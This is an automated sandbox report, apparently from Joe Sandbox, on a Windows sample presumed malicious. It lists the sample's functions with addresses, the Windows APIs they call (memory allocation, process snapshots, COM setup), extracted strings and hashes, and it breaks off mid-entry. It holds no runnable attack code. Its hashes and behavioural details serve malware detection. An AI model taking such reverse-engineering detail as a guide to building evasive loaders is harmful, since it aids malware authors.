GetCurrentProcessId.KERNEL32 ref: 004087B4
GetCurrentThreadId.KERNEL32 ref: 004087BE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
GetForegroundWindow.USER32 ref: 00408870
ExitProcess.KERNEL32 ref: 00408972

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5

Function 0043A9B0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043CD60 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0043CD85

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ihgf
API String ID: 2994545307-2948842496
Opcode ID: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
Opcode Fuzzy Hash: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A

Function 0043B05B Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
Opcode Fuzzy Hash: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD

Function 024B003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 024B024D

Strings

kernel32.dll, xrefs: 024B008F, 024B0095
cess, xrefs: 024B018D

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: ed7daa7ddff39a72fcb3f553f3f8b8c31c846d27a4821ffb9464b0ce1f7a7a5d
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: D6526A74A01229DFDB65CF58C984BADBBB1BF09305F1480DAE54DAB351DB30AA85CF24

Function 0043AB0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043AB9F

Strings

ilmn, xrefs: 0043AB7D

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: ForegroundWindow
String ID: ilmn
API String ID: 2020703349-1560153188
Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286

Function 008D9296 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008D92BE
Module32First.KERNEL32(00000000,00000224), ref: 008D92DE

Memory Dump Source

Source File: 00000002.00000002.2550594932.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d8000_8BB0.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 986f91ff287a342b0a13685f30c6fbd5ccbb12cd99a9e971059c43fcadc66acd
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: D7F062351007147BD7203BF9988DA6F77ECFF49725F10062AE696D21C0DAB0EC454661

Function 024B0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,024B0223,?,?), ref: 024B0E19
SetErrorMode.KERNELBASE(00000000,?,?,024B0223,?,?), ref: 024B0E1E

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: b25280a7d5a245074ce1b288960052ef9f67ce7971dda664f71e596d7bd501e9
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 84D0123514512877DB012A94DC09BCE7B1CDF05B67F008011FB0DD9180C770954046E5

Function 0043A950 Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B65C,00000000,?), ref: 0043A982

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
Instruction ID: 722538be6ec62bdfb2320af1aff19aeee9eb7e72755357ed04131fae2c05cc9a
Opcode Fuzzy Hash: 2eba5718b67ec1480271e2bf1c34f5bd19b8968588a838e869f4d5b9ea06510f
Instruction Fuzzy Hash: 99E0E576414611FBC6001B24BC06B1B3665AF8A721F02183AF440E6115DA38E811859F

Function 0043AB91 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043AB9F

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49

Function 00438E70 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8

Function 00438E47 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E

Function 00438E51 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E

Function 008D8F55 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008D8FA6

Memory Dump Source

Source File: 00000002.00000002.2550594932.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d8000_8BB0.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 62849ee2102f47c93627703f6d8ba8ef74d46ee6d7ae21a465648cb904fe898e
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: A6113C79A00208EFDB01DF98C985E99BBF5EF08351F158095F9489B362D771EA50DF80

Non-executed Functions

Function 004361E0 Relevance: 32.1, APIs: 10, Strings: 8, Instructions: 636memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
SysAllocString.OLEAUT32(w!s#), ref: 004364FB
SysAllocString.OLEAUT32(A3q5), ref: 004365A1
VariantInit.OLEAUT32(?), ref: 00436613
VariantClear.OLEAUT32(?), ref: 00436775
SysFreeString.OLEAUT32(?), ref: 004367A0
SysFreeString.OLEAUT32(?), ref: 004367A6
SysFreeString.OLEAUT32(00000000), ref: 004367B3

Strings

T'g), xrefs: 0043652D
w!s#, xrefs: 004364F6, 004364FA
X&c8, xrefs: 0043628F
A;, xrefs: 0043643C
C, xrefs: 00436369
BC, xrefs: 00436565
z7}9A3q5, xrefs: 004365BB
Y/9Q, xrefs: 0043653D

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
API String ID: 2485776651-4124187736
Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A

Function 00423A34 Relevance: 10.4, Strings: 8, Instructions: 446COMMON

Download Yara Rule

Strings

4%, xrefs: 00423CD5
<>, xrefs: 004240B0
UW, xrefs: 00423E98
>V, xrefs: 00424356
EG, xrefs: 00423E7C
>V, xrefs: 004241B0
|~, xrefs: 0042402E
IK, xrefs: 00423E83

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: 4%$>V$>V$<>$EG$IK$UW$|~
API String ID: 0-2246970021
Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0

Function 024D3C9B Relevance: 10.4, Strings: 8, Instructions: 446COMMON

Download Yara Rule

Strings

IK, xrefs: 024D40EA
UW, xrefs: 024D40FF
<>, xrefs: 024D4317
EG, xrefs: 024D40E3
|~, xrefs: 024D4295
4%, xrefs: 024D3F3C
>V, xrefs: 024D4417
>V, xrefs: 024D45BD

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: 4%$>V$>V$<>$EG$IK$UW$|~
API String ID: 0-2246970021
Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction ID: 673c083dda466ade3b22f4fa009005119c1ebb858f007a0b802bb4adba919c70
Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction Fuzzy Hash: 3E3242B0601B469FDB48CF2AD580389BBB1FF45304F548698C9695FB5ADB35A892CFC0

Function 00425E90 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 648COMMON

Download Yara Rule

Strings

67, xrefs: 0042677F
V3R5, xrefs: 00426774
*mB, xrefs: 00426D24
@iB, xrefs: 0042693A, 00426DD8, 00426E0E

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: *mB$67$@iB$V3R5
API String ID: 0-119712241
Opcode ID: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
Opcode Fuzzy Hash: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86

Function 004205B0 Relevance: 8.0, Strings: 6, Instructions: 481COMMON

Download Yara Rule

Strings

&', xrefs: 00420966
wy, xrefs: 00420675
0c=e, xrefs: 0042068D
<k;m, xrefs: 0042069D
2g1i, xrefs: 00420695
B, xrefs: 00420ADF

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: &'$0c=e$2g1i$<k;m$B$wy
API String ID: 0-2430453506
Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46

Function 0042C64A Relevance: 7.8, Strings: 6, Instructions: 346COMMON

Download Yara Rule

Strings

D@6T, xrefs: 0042CA02
&=, xrefs: 0042CA18
5, xrefs: 0042C91D
EF, xrefs: 0042CB6A
0, xrefs: 0042C8BB
zJyL, xrefs: 0042CB49

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: &=$0$5$D@6T$EF$zJyL
API String ID: 0-3264166258
Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757

Function 024DC8B1 Relevance: 7.8, Strings: 6, Instructions: 346COMMON

Download Yara Rule

Strings

zJyL, xrefs: 024DCDB0
5, xrefs: 024DCB84
&=, xrefs: 024DCC7F
EF, xrefs: 024DCDD1
0, xrefs: 024DCB22
D@6T, xrefs: 024DCC69

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: &=$0$5$D@6T$EF$zJyL
API String ID: 0-3264166258
Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction ID: 754891c4d55f5db34a85f9461a0f1e3eb3220a3c68ddaae8a40768f9bf8b14b1
Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction Fuzzy Hash: 98B1E77114C3818AE325CF29C4A07BBFBD2AFD2314F188A6ED4D98B391DB748549CB12

Function 024B89F7 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 024B8A1B
GetCurrentThreadId.KERNEL32 ref: 024B8A25
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 024B8AC2
GetForegroundWindow.USER32 ref: 024B8AD7
ExitProcess.KERNEL32 ref: 024B8BD9

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction ID: 54a5fac1633ffd5c1d281e60bee0341c1d5af9d1a019c1854c930726c95c202b
Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction Fuzzy Hash: 4B418E77F4431807D71CAE75CC993AAB69B9BC4314F09803F6D86AB390DE785C0556D0

Function 00422E93 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 394COMMON

Download Yara Rule

Strings

X9{;, xrefs: 0042330B
r1B, xrefs: 00423169
)*, xrefs: 00423216

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: )*$X9{;$r1B
API String ID: 0-1001561910
Opcode ID: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
Opcode Fuzzy Hash: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A

Function 0041BEA0 Relevance: 6.9, Strings: 5, Instructions: 684COMMON

Download Yara Rule

Strings

-, xrefs: 0041C167
de, xrefs: 0041C34D
C\, xrefs: 0041C1F0
Iz, xrefs: 0041C15F
[^, xrefs: 0041C1E8

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: -$C\$Iz$[^$de
API String ID: 0-3020956940
Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86

Function 024D0817 Relevance: 6.7, Strings: 5, Instructions: 481COMMON

Download Yara Rule

Strings

&', xrefs: 024D0BCD
wy, xrefs: 024D08DC
2g1i, xrefs: 024D08FC
0c=e, xrefs: 024D08F4
<k;m, xrefs: 024D0904

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: &'$0c=e$2g1i$<k;m$wy
API String ID: 0-3335612808
Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
Instruction ID: ac04301b040ad830d518737573119979119cbdc364c38c46fa818bd493266cac
Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
Instruction Fuzzy Hash: 8DD1F7B56183018BD724DF25C86176BB7F2EF92318F18996DE4828F3A4F7799401CB52

Function 0042C6E4 Relevance: 6.6, Strings: 5, Instructions: 336COMMON

Download Yara Rule

Strings

D@6T, xrefs: 0042CA02
&=, xrefs: 0042CA18
5, xrefs: 0042C91D
EF, xrefs: 0042CB6A
zJyL, xrefs: 0042CB49

Memory Dump Source

Source File: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2550346622.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757

Function 024DC94B Relevance: 6.6, Strings: 5, Instructions: 336COMMON

Download Yara Rule

Strings

zJyL, xrefs: 024DCDB0
5, xrefs: 024DCB84
&=, xrefs: 024DCC7F
EF, xrefs: 024DCDD1
D@6T, xrefs: 024DCC69

Memory Dump Source

Source File: 00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_24b0000_8BB0.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
